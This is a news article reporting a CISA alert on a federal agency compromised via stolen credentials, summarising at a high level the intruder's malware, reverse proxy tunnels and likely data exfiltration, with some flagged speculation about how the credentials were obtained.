The Cybersecurity and Infrastructure Security Agency (CISA), which is a division of the Department of Homeland Security, has issued a lengthy security alert where it says that a federal agency was “compromised” by a “malicious cyber actor.” According to CISA, the federal agency was infiltrated in a cyberattack stemming from compromised credentials. After the threat actors gained access, CISA said they were able to install a “unique, multi-stage malware” that did not set off any intrusion detection systems.
The malware in question is complex and exploited weaknesses in the unnamed agency’s firewall to gain persistent access. Through this, they created command and control and persistence via Secure Socket Shell (SSH) tunnel/reverse SOCKS proxy, and eventually created a local account.
CISA stated the following in its alert about the attacker’s actions post-exploitation:
The cyberthreat actor used the local account to:
- Browse directories on a victim file server.
- Copy a file from a user’s home directory to their locally mounted remote share.
- CISA analysts detected the cyber threat actor interacting with other files on users’ home directories but could not confirm whether they were exfiltrated.
- Create a reverse SMB SOCKS proxy that allowed connection between a cyber threat actor-controlled VPS and the victim organization’s file server.
- Interact with PowerShell module Invoke-TmpDavFS.psm.
- Exfiltrate data from an account directory and file server directory using tsclient
- Create two compressed Zip files with several files and directories on them (Archive Collected Data [T1560]); it is likely that the cyber threat actor exfiltrated these Zip files, but this cannot be confirmed because the actor masked their activity.
It is not known how the compromised credentials were obtained. There are a few likely possibilities, though these should be taken as speculation as the investigation is still ongoing. Password reuse is the most likely culprit as it is a huge problem, even within federal agencies that handle sensitive data. Another possibility was the method of 2FA being compromised.
Lastly, it is possible that the attacker had been monitoring the network before making this move. By this, it is meant that, with the firewall possessing (CISA affirmed) weaknesses, the threat actor could have remotely accessed the network and employed man-in-the-middle attacks with the malicious malware to gain sensitive knowledge.
Featured image: CISA/NICCS